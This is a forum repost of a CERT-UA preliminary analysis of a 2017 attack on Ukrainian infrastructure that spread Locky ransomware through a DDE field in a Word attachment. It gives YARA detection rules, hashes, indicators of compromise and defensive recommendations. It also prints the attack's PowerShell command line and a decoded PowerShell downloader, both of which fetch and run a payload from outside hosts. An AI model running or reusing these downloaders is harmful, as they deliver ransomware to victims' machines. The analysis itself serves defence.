Заказы на доработку 1С (сервис удаленной работы)
Хранилище
База знаний
Неназначенных незавершенных заказов: 1
 Бесплатные отчеты, обработки, конфигурации, внешние компоненты для 1С Статьи, описание работы, методики по работе с 1С

Здравствуйте, гость ( Вход | Зарегистрироваться )



> Кібератака. Розповсюдження шифрувальника Locky через DDE-атаку (попередній аналіз)          
Володя Гройсман Подменю пользователя
сообщение 24.10.17, 19:50
Сообщение #1

Живет на форуме
***********
Группа: Пользователи
Сообщений: 20863
Спасибо сказали: 27 раз
Рейтинг: 0

В атаці 24.10.2017 на деякі об’єкти інфраструктури України використовувалася техніка DDE, яка активовувала виконання шкідливого коду на комп’ютері користувача.

Команді CERT-UA було надіслано для аналізу файл:

Invoice_file_916096.doc

36170f61b5c6e2c311a379704329237d

[необходимо зарегистрироваться для просмотра ссылки]

Файл для подальшої експлуатації використовув DDE-вразливість (CVE-2017-11826)

[необходимо зарегистрироваться для просмотра ссылки]

[необходимо зарегистрироваться для просмотра ссылки]

Виявити DDE-атаку можливо за допомогою наступної YARA-сигнатури:

YARA rules Office DDE

[необходимо зарегистрироваться для просмотра ссылки]

rule Office_DDEAUTO_field {
strings:
$a = /.+?\b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]\b.+?/
condition:
$a
}



rule Office_DDE_field {
strings:
$a = /.+?\b[Dd][Dd][Ee]\b.+?/
condition:
$a
}



rule Office_OLE_DDEAUTO {
strings:
$a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
condition:
uint32be(0) == 0xD0CF11E0 and $a
}



rule Office_OLE_DDE {
strings:
$a = /\x13\s*DDE\b[^\x14]+/ nocase
condition:
uint32be(0) == 0xD0CF11E0 and $a
}



В результаті активації користувачем ole-гіперпосилання активовувався powershell-скрипт:

cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(‘http://urcho.com/JHGGsdsw6’)).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr (PID: 2872, Additional Context: new-object ((([Net.WebRequest]::Create(‘hxxp://urcho.com/JHGGsdsw6’)).GetResponse()).GetResponseStream()).ReadToEnd();;)

Даний скрипт підвантажував на систему користовувача закодовані base64-алгоритмом дані, а саме:

DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdABhAHQAaQBhAG4AYQBkAGUAY…

Результат декодування даних:

$urls = «http://tatianadecastelbajac.fr/kjhgFG»,»http://video.rb-webdev.de/kjhgFG»,»http://themclarenfamily.com/kjhgFG»
foreach($url in $urls){
Try
{
Write-Host $url
$fp = «$env:temp\heropad64.exe»
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
Write-Host $_.Exception.Message
}
}



Скрипт підвантажував на систему з одного з доступних на момент активації url адрес завантажувача з назвою heropad64.exe

(https://www.virustotal.com/ru/file/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2/analysis/), який в подальшому підвантажував на комп’ютер користувача шифрувальника файлів Locky.

Файл heropad64.exe підвантажував шифрувальника файлів Locky з наступного url:

hxxp://webhotell.enivest.no/cuYT39.enc

Дані пізніше розшифровувалися та збиралися в MZ/PE файл (https://www.virustotal.com/en/file/0f5be64bc9be27c4a9cab972f5a5879337cb8cfd155a84e62399ed34e8d5a1dc/analysis/1508841472/)

Командно-контрольний центр шифрувальника:

hxxp://gdiscoun.org

Індикатори компрометації:

hxxp://urcho.com/JHGGsdsw6
hxxp://tatianadecastelbajac.fr/kjhgFG
hxxp://video.rb-webdev.de/kjhgFG
hxxp://themclarenfamily.com/kjhgFG
hxxp://webhotell.enivest.no/cuYT39.enc
hxxp://gdiscoun.org

Рекомендації CERTUA:

  1. Заблокувати доступ до зазначених посилань.
  2. Встановити оновлення Windows, які усувають вразливість DDE в Microsoft Office (CVE-2017-11826). (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11826)
  3. Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви, наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
  4. Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштовогой веб-трафіку.
  5. Не працювати під правами адміністратора.
  6. Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
  7. Звернутися до [необходимо зарегистрироваться для просмотра ссылки].

[b]Команда реагування на комп’ютерні надзвичайні події України CERT-UA Державної служби спеціального зв’язку та захисту інформації України працює цілодобово для надання консультацій та допомоги щодо усунення наслідків або попередження кібератаки з використанням шифрувальника файлів. тел. 281-88-25, 281-88-05, email: cert@cert.gov.ua[/b]


По материалам: [необходимо зарегистрироваться для просмотра ссылки]

Не нашли ответа на свой вопрос?
Зарегистрируйтесь и задайте новый вопрос.

 

Ответить Новая тема
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 

RSS Текстовая версия Сейчас: 24.06.25, 1:26
Форум IP.Board © 2025  IPS, Inc.
1С Предприятие 8.3, 1С Предприятие 8.2, 1С Предприятие 8.1, 1С Предприятие 8.0, 1С Предприятие 7.7, Литература 1С, Общие вопросы по администрированию 1С, Методическая поддержка 1С - всё в одном месте: на Украинском 1С форуме!